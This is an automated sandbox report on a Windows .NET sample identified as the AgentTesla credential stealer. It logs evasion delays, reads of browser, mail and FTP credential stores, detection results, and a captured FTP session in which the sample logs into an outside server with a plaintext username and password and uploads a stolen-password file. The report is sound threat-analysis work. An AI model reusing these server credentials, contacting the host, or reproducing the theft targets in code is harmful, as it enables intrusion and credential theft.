Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197890
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197781
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197671
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197562
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197453
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197343
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197234
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197124
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1197013
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1196905
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1196689
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1196562
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1196453
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1196343
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1196234
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1196125
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1196015
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1195906
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1195796
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1195687
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1195578
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1195468
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1195359
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1195250
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1195140
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1195031
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1194921
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1194812
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1194703
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1194592
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1194483
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Thread delayed: delay time: 1194375
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Window / User API: threadDelayed 1940
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Window / User API: threadDelayed 7918
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep count: 32 > 30
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 5720; Thread sleep count: 1940 > 30
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1199871s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 5720; Thread sleep count: 7918 > 30
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1199762s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1199656s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1199463s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1199348s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1199218s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1199109s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1199000s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1198890s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1198781s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1198672s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1198562s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1198453s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1198342s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1198234s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1198122s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197998s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197890s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197781s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197671s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197562s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197453s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197343s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197234s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197124s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1197013s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1196905s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1196689s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1196562s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1196453s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1196343s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1196234s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1196125s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1196015s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1195906s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1195796s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1195687s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1195578s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1195468s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1195359s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1195250s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1195140s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1195031s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1194921s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1194812s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1194703s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1194592s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1194483s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664; Thread sleep time: -1194375s >= -30000s
Source: C:\Users\user\Desktop\pE7icjUisS.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\pE7icjUisS.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\pE7icjUisS.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: pE7icjUisS.exe, 00000000.00000002.3855637535.00000000011BC000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Queries volume information: C:\Users\user\Desktop\pE7icjUisS.exe VolumeInformation
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: Yara match; File source: pE7icjUisS.exe, type: SAMPLE
Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: pE7icjUisS.exe PID: 996, type: MEMORYSTR
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\pE7icjUisS.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\pE7icjUisS.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\pE7icjUisS.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\pE7icjUisS.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\pE7icjUisS.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\pE7icjUisS.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\pE7icjUisS.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\pE7icjUisS.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

Source: Yara match; File source: pE7icjUisS.exe, type: SAMPLE
Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: pE7icjUisS.exe PID: 996, type: MEMORYSTR
MITRE ATT&CK matrix (one column per tactic; a leading number is the count of matched signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 141 Virtualization/Sandbox Evasion | 21 Input Capture | 1 Process Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 141 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 11 Archive Collected Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 2 Data from Local System | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | 1 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 24 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label | Link
pE7icjUisS.exe | 82% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
pE7icjUisS.exe | 100% | Avira | HEUR/AGEN.1305739 |
pE7icjUisS.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://ftp.normagroup.com.tr | 100% | Avira URL Cloud | phishing |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ftp.normagroup.com.tr | 104.247.165.99 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://ftp.normagroup.com.tr | pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://account.dyn.com/ | pE7icjUisS.exe | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.247.165.99 | ftp.normagroup.com.tr | United States | | 8100 | ASN-QUADRANET-GLOBALUS | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1567461
                            Start date and time:2024-12-03 15:56:00 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 51s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:pE7icjUisS.exe
                            renamed because original name is a hash value
                            Original Sample Name:fcb6030b15822380735483e1911f0148961b7f7cc4a9fe30561825ed3cd22dbc.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 53
                            • Number of non-executed functions: 7
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: pE7icjUisS.exe
Time | Type | Description
09:57:17 | API Interceptor | 10930208x Sleep call for process: pE7icjUisS.exe modified
Match: 104.247.165.99
Associated Sample Name / URL | Detection | Threat Name | Context
hesaphareket.exe | malicious | AgentTesla | -
wKmhzHd4MC.exe | malicious | AgentTesla | -
hesaphareketi__20241001.exe | malicious | AgentTesla | -
EUR Swift Bildirimi12-08-2024.exe | malicious | AgentTesla | -
LisectAVT_2403002A_134.exe | malicious | AgentTesla | -
hesaphareketi_____.exe | malicious | AgentTesla | -
hesaphareketi__.exe | malicious | AgentTesla | -
hesaphareketi-.exe | malicious | AgentTesla | -
hesaphareketi-.exe | malicious | AgentTesla | -
hesaphareketi-01-pdf.exe | malicious | AgentTesla | -
Match: ftp.normagroup.com.tr
Associated Sample Name / URL | Detection | Threat Name | Context
hesaphareket.exe | malicious | AgentTesla | 104.247.165.99
wKmhzHd4MC.exe | malicious | AgentTesla | 104.247.165.99
hesaphareketi__20241001.exe | malicious | AgentTesla | 104.247.165.99
EUR Swift Bildirimi12-08-2024.exe | malicious | AgentTesla | 104.247.165.99
LisectAVT_2403002A_134.exe | malicious | AgentTesla | 104.247.165.99
hesaphareketi_____.exe | malicious | AgentTesla | 104.247.165.99
hesaphareketi__.exe | malicious | AgentTesla | 104.247.165.99
hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
hesaphareketi-01-pdf.exe | malicious | AgentTesla | 104.247.165.99
Match: ASN-QUADRANET-GLOBALUS
Associated Sample Name / URL | Detection | Threat Name | Context
RFQ 9-XTC-204-60THD.xlsx.exe | malicious | Quasar | 69.174.99.131
quotation.exe | malicious | FormBook | 155.94.253.4
Quote Qu11262024.scr.exe | malicious | Remcos, GuLoader | 66.63.187.246
sora.sh4.elf | malicious | Mirai | 154.205.102.33
la.bot.arm.elf | malicious | Mirai | 104.200.67.193
la.bot.arm6.elf | malicious | Unknown | 103.230.140.211
botx.mpsl.elf | malicious | Mirai | 199.180.254.132
specifications.exe | malicious | FormBook, PureLog Stealer | 155.94.253.4
armv7l.elf | malicious | Gafgyt, Mirai | 193.111.248.45
mipsel.elf | malicious | Gafgyt, Mirai | 193.111.248.45
                                                No context
                                                No context
                                                No created / dropped files found
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):4.987741447178301
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:pE7icjUisS.exe
                                                File size:239'104 bytes
                                                MD5:95c864e4a99b56f70fe18081066ed7b3
                                                SHA1:a8112f75b9869798c6e15782cd651690f1b6faf8
                                                SHA256:fcb6030b15822380735483e1911f0148961b7f7cc4a9fe30561825ed3cd22dbc
                                                SHA512:66330ffc5800b4645ed2db0da7401271680ec7fd1f45f507de228847996532ef2763078aa9e95cba727b0a339c922831b84aae892db7a8e305cdbfb811ef0e85
                                                SSDEEP:3072:QOw/k7XjnbP29wMYISDyFowVpNU5lA5Iazt:xws7Xjnbu9zYISDLwVpNn5fz
                                                TLSH:62341E037E88EB15E1A83E3782EF6D2413B2B4C71633D60B6F49AFA518516425C7E72D
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@................................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x43b9fe
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6604D612 [Thu Mar 28 02:29:38 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3b9ac | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c000 | 0x546 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3e000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x39a04 | 0x39c00 | 04fa7d4fe71e5153e384c1479670226d | False | 0.35598028273809523 | data | 4.999091211254317 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x3c000 | 0x546 | 0x600 | 24d25170dba5f4a0d8d7afa9ed6e09f9 | False | 0.4016927083333333 | data | 4.003023872957898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3e000 | 0xc | 0x200 | a4e9d59a1ed0fd9b29b29b052f2fcf6d | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x3c0a0 | 0x2bc | data | - | - | 0.44142857142857145
RT_MANIFEST | 0x3c35c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T15:57:16.502872+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.7 | 49711 | 104.247.165.99 | 21 | TCP
2024-12-03T15:57:17.679216+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.7 | 49720 | 104.247.165.99 | 51146 | TCP
2024-12-03T15:57:17.800328+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.7 | 49720 | 104.247.165.99 | 51146 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 15:57:11.752593994 CET | 53827 | 53 | 192.168.2.7 | 1.1.1.1
Dec 3, 2024 15:57:12.308768034 CET | 53 | 53827 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 15:57:11.752593994 CET | 192.168.2.7 | 1.1.1.1 | 0x5833 | Standard query (0) | ftp.normagroup.com.tr | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 15:57:12.308768034 CET | 1.1.1.1 | 192.168.2.7 | 0x5833 | No error (0) | ftp.normagroup.com.tr | - | 104.247.165.99 | A (IP address) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 3, 2024 15:57:13.687917948 CET | 21 | 49711 | 104.247.165.99 | 192.168.2.7 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 4 of 50 allowed.
220-Local time is now 17:57. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Dec 3, 2024 15:57:13.690722942 CET | 49711 | 21 | 192.168.2.7 | 104.247.165.99 | USER admins@normagroup.com.tr
Dec 3, 2024 15:57:14.132723093 CET | 21 | 49711 | 104.247.165.99 | 192.168.2.7 | 331 User admins@normagroup.com.tr OK. Password required
Dec 3, 2024 15:57:14.133841038 CET | 49711 | 21 | 192.168.2.7 | 104.247.165.99 | PASS ab+LNvim5PAo
Dec 3, 2024 15:57:14.604690075 CET | 21 | 49711 | 104.247.165.99 | 192.168.2.7 | 230 OK. Current restricted directory is /
Dec 3, 2024 15:57:15.047388077 CET | 21 | 49711 | 104.247.165.99 | 192.168.2.7 | 504 Unknown command
Dec 3, 2024 15:57:15.047589064 CET | 49711 | 21 | 192.168.2.7 | 104.247.165.99 | PWD
Dec 3, 2024 15:57:15.490068913 CET | 21 | 49711 | 104.247.165.99 | 192.168.2.7 | 257 "/" is your current location
Dec 3, 2024 15:57:15.490397930 CET | 49711 | 21 | 192.168.2.7 | 104.247.165.99 | TYPE I
Dec 3, 2024 15:57:15.939477921 CET | 21 | 49711 | 104.247.165.99 | 192.168.2.7 | 200 TYPE is now 8-bit binary
Dec 3, 2024 15:57:15.939666033 CET | 49711 | 21 | 192.168.2.7 | 104.247.165.99 | PASV
Dec 3, 2024 15:57:16.381412029 CET | 21 | 49711 | 104.247.165.99 | 192.168.2.7 | 227 Entering Passive Mode (104,247,165,99,199,202)
Dec 3, 2024 15:57:16.502871990 CET | 49711 | 21 | 192.168.2.7 | 104.247.165.99 | STOR PW_user-960781_2024_12_03_09_57_10.html
Dec 3, 2024 15:57:17.678606033 CET | 21 | 49711 | 104.247.165.99 | 192.168.2.7 | 150 Accepted data connection
Dec 3, 2024 15:57:18.121918917 CET | 21 | 49711 | 104.247.165.99 | 192.168.2.7 | 226-File successfully transferred
226 0.443 seconds (measured here), 0.71 Kbytes per second
                                                Target ID:0
                                                Start time:09:57:09
                                                Start date:03/12/2024
                                                Path:C:\Users\user\Desktop\pE7icjUisS.exe
                                                Wow64 process (32bit):true
